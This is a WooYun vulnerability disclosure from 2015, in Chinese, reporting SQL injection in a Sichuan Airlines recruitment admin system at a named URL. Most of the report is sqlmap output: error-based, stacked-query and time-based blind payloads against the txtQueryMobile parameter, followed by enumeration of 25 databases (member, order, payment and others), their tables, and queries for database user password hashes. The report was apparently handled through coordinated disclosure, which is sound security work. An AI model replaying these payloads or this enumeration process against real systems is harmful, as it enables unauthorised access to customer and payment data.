当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100147

漏洞标题:四川航空某系统存在SQL注入

相关厂商:四川航空

漏洞作者: 路人甲

提交时间:2015-03-08 14:04

修复时间:2015-04-22 14:06

公开时间:2015-04-22 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-08: 细节已通知厂商并且等待厂商处理中
2015-03-11: 厂商已经确认,细节仅向厂商公开
2015-03-21: 细节向核心白帽子及相关领域专家公开
2015-03-31: 细节向普通白帽子公开
2015-04-10: 细节向实习白帽子公开
2015-04-22: 细节向公众公开

简要描述:

四川航空某系统存在SQL注入

详细说明:

昨天交的弱密码问题还没审核,那就顺便找找别的漏洞吧
问题所在系统:http://www.scal.com.cn/invite2011/admin/ 需要登录
注入点

8.png


多个参数试了2个,别的请自查

sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Place: POST
Parameter: txtQueryMobile
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl  8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' AND 2000=CONVERT(INT,(SELECT CHAR(113) CHAR(105) CHAR(102) CHAR(97) CHAR(113) (SELECT (CASE WHEN (2000=2000) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(121) CHAR(120) CHAR(117) CHAR(113))) AND '%'='&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl  8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%'; WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTA4MTc4ODA4DxYCHg5Tb3J0RXhwcmVzc2lvbgUMW0NyZWF0ZVRpbWVdFgICAw9kFgQCAw9kFgQCFw88KwALAQAPFgweC18hSXRlbUNvdW50Zh4IRGF0YUtleXMWAB4QQ3VycmVudFBhZ2VJbmRleGYeCVBhZ2VDb3VudAIBHhVfIURhdGFTb3VyY2VJdGVtQ291bnRmHhBWaXJ0dWFsSXRlbUNvdW50ZmRkAhsPD2QWAh4Hb25jbGljawUucmV0dXJuIGNvbmZpcm0oJ ehruiupOimgeWIoOmZpOaVsOaNruWQl  8nycpO2QCBQ9kFgICBw8QZGQWAGRkCK5tQCFCRfiJRSyVMQjhbR EXm0=&__EVENTVALIDATION=/wEWHgLbue rCQLYntmaCQKkxvKYBwK3xr6bBwKoxr6bBwKHp7rEBQLAz7uQDALTz/eTDALMz/eTDALNz/eTDALOz/eTDAKK0ZnaDwLk4ZnuBgKSj8u1DQKYsqmEDwKTwrWkAQLvjry/BQKFt7SHCQLLlo/UAgLLlovUAgLLlofUAgLLloPUAgLLlv/TAgLLlvvTAgLLlvfTAgLLlvPTAgLLlq/UAgLLlqvUAgKLk6XGBQK17cLhATLcBKG8L7pXJY2ygX42MtRwTbj/&txtQueryName=1&ddlQuerySex=0&txtQueryMobile=12312334567%' WAITFOR DELAY '0:0:5'--&ddlQueryIsEnable=0&txtQueryBeginTime=2015-03-03&txtQueryEndTime=2015-03-03&txtSchool=111&txtgduBgTime=2015-02-02&txtgduEdTime=2015-03-08&btnQuery=%E6%9F%A5 %E8%AF%A2&hfID=
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [25]:
[*] Invite2011
[*] master
[*] model
[*] msdb
[*] SCAL3_B2C
[*] SCAL3_Card
[*] SCAL3_Familiar
[*] SCAL3_Hotel
[*] SCAL3_Insurance
[*] SCAL3_InsuranceNew
[*] SCAL3_Itinerary
[*] SCAL3_Log
[*] SCAL3_Mall
[*] SCAL3_Member
[*] SCAL3_Message
[*] SCAL3_MinPrice
[*] SCAL3_News
[*] SCAL3_Order
[*] SCAL3_Pay
[*] SCAL3_Preferential
[*] SCAL3_SaleRule
[*] SCAL3_SessionService
[*] SCAL3_SOA
[*] SCAL3_System
[*] tempdb


<Database: master
[291 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS              |
| INFORMATION_SCHEMA.COLUMNS                        |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE            |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES              |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE        |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE         |
| INFORMATION_SCHEMA.DOMAINS                        |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS             |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE               |
| INFORMATION_SCHEMA.PARAMETERS                     |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS        |
| INFORMATION_SCHEMA.ROUTINES                       |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS                |
| INFORMATION_SCHEMA.SCHEMATA                       |
| INFORMATION_SCHEMA.TABLES                         |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS              |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES               |
| INFORMATION_SCHEMA.VIEWS                          |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE              |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE               |
| spt_fallback_db                                   |
| spt_fallback_dev                                  |
| spt_fallback_usg                                  |
| spt_monitor                                       |
| spt_values                                        |
| sys.all_columns                   /code>
<code>Database: Invite2011
[11 tables]
+---------------------------------------------------+
| sqlmapoutput                                      |
| sysdiagrams                                       |
| t_Invite                                          |
| t_InviteEducation                                 |
| t_InviteEducation_bak                             |
| t_InviteFamily                                    |
| t_InviteFamily_bak                                |
| t_InviteWork                                      |
| t_InviteWork_bak                                  |
| t_Invite_bak                                      |
| t_User                                            |
+---------------------------------------------------+
Database: msdb
[10 tables]
+---------------------------------------------------+
| backupfile                                        |
| backupmediafamily                                 |
| backupmediaset                                    |
| backupset                                         |
| logmarkhistory                                    |
| restorefile                                       |
| restorefilegroup                                  |
| restorehistory                                    |
| suspect_pages                                     |
| sysdac_instances                                  |
+---------------------------------------------------+

漏洞证明:

<code></cback-end DBMS: Microsoft SQL Server 2005
database management system users password hashes:
[*] invite [1]:
password hash: NULL
[*] sa [1]:
password hash: NULL
ode>
其它库貌似是http://www.scal.com.cn/B2C的

9.png


需要提权

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-11 11:32

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向网站管理单位通报。

最新状态:

暂无